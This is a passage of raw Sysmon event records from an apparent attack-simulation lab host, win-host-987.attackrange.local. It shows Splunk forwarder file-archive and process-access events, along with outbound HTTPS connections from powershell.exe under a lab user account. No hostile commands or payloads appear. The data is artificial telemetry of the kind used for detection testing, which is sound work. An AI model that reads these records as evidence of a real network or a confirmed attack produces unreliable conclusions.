Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E8D8B8AB6D1B3C8A1B449CC60881E44A,SHA256=7898E30AED97DC6CD66BDCD8683A2F540A041FF949C59E23946515C9F4E527A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:38.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3383D5E1FDEEDB6AC9DC0072DFF885,SHA256=B92A95BE5FF582081249AA344C4C8CF24A34A775EE5510D933F78A68F5A7F28C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:38.111{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FCB0FC53130F31CC917A190EC45B0B0,SHA256=66F7B86F5147B4144CDEE402FECE9CF625E1ABD4928159D93E3CE36F0D546BD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:39.725{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9DF2C8997C3E98EDCE563D3A8C690CF,SHA256=D892CC531120D6619272FCE95A2BA46A1A183404229F4ECB439D21A5CB1458C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.314{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56729-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 22542200x800000000000000035085415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:03.166{00000000-0000-0000-0000-000000000000}5304win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035085418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:40.793{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0716D794F712DF28ADF6566174164EE1,SHA256=B9BAF2AE7E5CB4A7716E50515D4911F88A968B4F8050EC056A7C6D68646FA9F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:41.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6330385F6AB2BF3621421162D41ACE50,SHA256=B14928FA0D1CE90D6BAE649CFC5BC37F808FA5E56FD33E018419291F7C3AD464,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:05.118{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56730-false10.0.1.12-8000- 23542300x800000000000000035085421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:42.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38835937EE77C145F2EFE968E7B5B67,SHA256=82EAE366A167C00DAB36332EE4A19124C0358A41E1AEA5D70DA0AE683A081978,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3805B007B5DF1F5AD8B938F5BD1E586,SHA256=CDC9CD966200700AE33CDF819011D647F3CE5302752FE536B082FB2F0C4DC744,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.736{B81B27B7-4F4F-613A-6390-03000000C801}61044580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.574{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.559{B81B27B7-4F4F-613A-6390-03000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:08.331{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56731-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.321{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EB06017A91CA69258D560DDDC9C083E1,SHA256=11178CEC133ECFF5EF5E9E6267D0D6E3E80FC9C31B413065EFECDAD88BCE13CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085448Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.941{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.936{B81B27B7-4F50-613A-6590-03000000C801}5272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6396495B517138D8173F6A06303DFC15,SHA256=27D144C8B52CF16B82DF41B9B00E3204A4065A35C979FD15B6C01A77392B26B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29390A4474E6FCBD66257930D9E0FD8B,SHA256=227E2D41CB2E2D47054E09F7A59BF3C58000E87CA3666A4C344C361E54052EA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD3383D5E1FDEEDB6AC9DC0072DFF885,SHA256=B92A95BE5FF582081249AA344C4C8CF24A34A775EE5510D933F78A68F5A7F28C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.441{B81B27B7-4F50-613A-6490-03000000C801}51362996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F50-613A-6490-03000000C801}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:44.273{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 